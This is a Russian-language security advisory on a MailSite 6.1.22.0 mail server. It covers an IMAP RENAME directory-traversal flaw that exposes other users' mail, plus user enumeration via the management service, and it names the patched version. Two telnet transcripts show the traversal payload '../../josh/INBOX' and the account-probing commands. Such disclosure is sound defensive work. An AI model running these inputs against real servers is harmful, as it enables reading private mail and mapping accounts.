Дата публикации: | 06.01.2006 |
Всего просмотров: | 2716 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2006-0130 CVE-2006-0127 CVE-2006-0129 |
Вектор эксплуатации: | Удаленная |
Воздействие: | Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | MailSite 6.x |
Уязвимые версии: MailSite 6.1.22.0, возможно более ранние версии
Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметрах команды RENAME. Удаленный пользователь может с помощью символов обхода каталога просмотреть письма других пользователей на системе. Пример:
josh at lab1:~$ telnet 10.0.0.5 143 Trying 10.0.0.5... Connected to 10.0.0.5. Escape character is '^]'. * OK MailSite IMAP4 Server 6.1.22.0 ready a1 login joe pass a1 OK LOGIN completed a2 rename ../../josh/INBOX gotcha a2 OK RENAME folder ../../josh/INBOX renamed to gotcha a3 select gotcha * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) * 0 EXISTS * 0 RECENT * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] * OK [UNSEEN 0] * OK [UIDVALIDITY 514563061] UIDs are valid a3 OK [READ-WRITE] opened gotcha Удаленный пользователь может определить наличие учетной записи на системе с помощью Management Server (106/tcp). Пример:
josh at maoz:~$ telnet 10.0.0.6 106 Trying 10.0.0.6... Connected to 10.0.0.6 (10.0.0.6). Escape character is '^]'. 200 Ok, "MailSite Mail Management Server (7.0.3.1) ready" user IDoNotExist 510 "Error 2 in OpenMailbox, The system cannot find the file specified. " user postmaster 200 Ok, "send password" URL производителя: www.rockliffe.com/products/mailsite-email-server-software.asp Решение: Установите последнюю версию (6.1.22.1) с сайта производителя. Источники: |
|
Ссылки: |
Rockliffe's Mailsite Mail Management Server User Enumeration Flaw Rockliffe's Mailsite Imap Directory Transversal Vulnerability |